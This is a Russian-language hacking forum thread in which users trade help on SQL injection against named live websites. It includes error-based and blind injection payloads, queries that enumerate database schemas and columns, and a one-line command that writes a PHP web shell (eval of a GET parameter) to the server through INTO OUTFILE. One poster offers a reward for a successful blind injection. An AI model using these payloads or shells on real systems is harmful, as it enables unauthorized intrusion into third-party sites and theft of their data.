подскажите пожалуйста, тут инъекция или что-то на нее похожее? http://nudistavenue.com/browse/all/18-20%27/all
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
Вылазит тоже самое только c %20 SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start <= now() AND a.date_end >= now() AND a.status = 'active' AND a.adpage = 'knowledge_center_overview.php?type=2'%20group%20by%209999%20--%20' AND a.fileid = b.fileID [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' AND a.fileid = b.fileID' at line 5] как видно из запроса мой запрос как параметр передается и комментарий в конце не сканывает поэтому невыполняется, а если кавычку перед запросам убрать то там идет перенаправленние на главную страницу сразу хм при /**/ тоже перенаправляет на главную страницу. Карочи вот сайт http://www.wi-fi.org/knowledge_center_overview.php?type=2' расскажи че там как я просто учусь) за день штук 10 таких бывает) О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
Если версия mysql > 5, то можно узнать наверняка select table_schema from informashion_schema.tables where table_name='your_table'; Если такой возможности нет, то удостовериться сделав запрос из этой таблицы, назвав предполагаемую базу: select * from предполагаемая_база.your_table; ошибки нет - значит предположение верно
blablabla.php?start=16600+group+by+2+--+ ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1 как бороться с этим ,40 почему то не комментируется... mr.celt - спс
А это не в Limit ли скуля? можешь попробовать /* но что то мне подсказывает, что это скуля в limit...
(MSSQL) Что не так с запросом? Code: 1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')-- пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил
В limit нельзя использовать подзапросы. Если нет order bу, то крутится через union select. Если он есть, то после него нельзя использовать union, следовательно в таком случае проведение инъекции невозможно, только если сразу лить шелл. into outfile '/path/shell.php' lines terminated by "<?php eval($_GET[c]);?>"
Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject. Есть баг Но при Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти? Через order+by определил 5 столбцов. Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку. Если все прокатит возможно хорошее вознагрождение!
попробуйте "in" вместо ">" mysql> SELECT 2 IN (0,3,5,7); -> 0 mysql> SELECT 2 IN (1,2,3,2,5,7) -> 1 или уменьш значение, потому и выворачиваетцо потому что ложь site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>10 а воше статьи почитайте как их крутить. зы я не ясновыдящий и другие.
статтей на ачате куча: site:forum.antichat.ru blind в гугле или поиском у нас или другие ресурсы на такую тематику. продолжение на rdot: https://rdot.org/forum/showthread.php?t=245&page=2. https://forum.antichat.ru/thread35207-blind.html https://forum.antichat.ru/thread18552-blind.html https://forum.antichat.ru/thread19844.html тоесть искать надо. ... зы в ваши вопросы по уязвимостям ->поиск в этой теме ->blind. и будет куча таких вопросов и как они решались.
Возможен ли inject с такой ошибкой: Code: Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/.../index.php on line 19 В запрос подставлял '
Еще вопрос (не относящийся к предыдущему)... при подстановке ' в запрос... открывается белая страница с надписью "Tampering: 338" Что это означает?
